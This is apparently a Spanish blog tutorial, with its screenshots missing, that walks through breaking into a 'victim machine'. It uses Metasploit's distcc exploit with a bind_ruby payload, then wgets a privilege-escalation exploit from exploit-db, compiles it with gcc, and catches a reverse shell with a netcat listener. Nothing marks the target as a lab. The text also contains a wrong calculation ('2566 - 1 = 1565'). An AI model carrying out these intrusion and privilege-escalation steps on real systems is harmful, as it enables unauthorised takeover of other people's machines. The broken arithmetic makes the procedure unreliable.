para comenzar abriremos una consola de backtrack, y luego ejecutamos el comando msfconsole
esperamos a que se abra ala consola de metasploit, una ves allí ejecutamos el comando search distcc, este comando busca en la base de datos es exploits relacionados con distcc
una ves terminado nos deberá aparecer lo siguiente
nos muestra el exploit que vamos a utilizar
ahora seleccionamos el exploit y lo ejecutamos
con el comando show options verificamos los parámetros que deben configurarse al exploit
procedemos a asignar la IP de la maquina victima con el comando set RHOST
luego asemos una búsqueda del payload que utilizaremos con el exploit de distcc, con el comando show payloads
luego lo asignamos a el modulo con el comando set payload seguido del payload que seleccionemos en este caso cmd/unix/bind_ruby
verificamos que se aya realizado los cambios
para ejecutarlo escribimos exploit
si todo se hiso correctamente nos devera de mostrar algo como esto
como se puede observar en la ultima linea, nos dice que se abrió una sentencia tipo shell, debemos tener en cuenta que en esta shell no podemos tabular como en las demás
ahora comprobamos que estemos dentro de la maquina victima ejecutando uname -a
y con que usuario estamos logueados utilizamos el comando whoami
ahora procedemos a escalar privilegios
dentro de la maquina victima con la shell que acabamos de obtener descargamos el siguiente exploit con el comando wget "http://www.exploit-db.com/dowload/8572"
ejecutamos ls para listar los archivos que contenga este usuario entre ellos el exploit que acabamos de descargar
ahora cambiaremos el nombre del archivo aunque la extensión de este cambie su contenido no lo ara
luego compilamos el exploit con el comando gcc seguido del nombre del exploit -o y el ejecutable en este caso exploit
luego en nuestra maquina backtrack abrimos una nueva consola, y configuramos netcat para que escuche por el puerto 1234, para que al ejecutar el exploit local la maquina victima nos permita ejecutar comandos remotos y tener el control sobre ella
para ejecutar el exploit se necesita que el payload se encuentre en /tmp/run y el PID del proceso
ahora lo que debemos hacer es que la victima se conecte a nosotros por netcat mediante una shell remota
luego determinamos el PID del proceso
luego lo que aremos sera tomar el numero del proceso y restarle el udve que en este caso es uno "2566 - 1 = 1565"
procedemos a ejecutar el exploit
No hay comentarios:
Publicar un comentario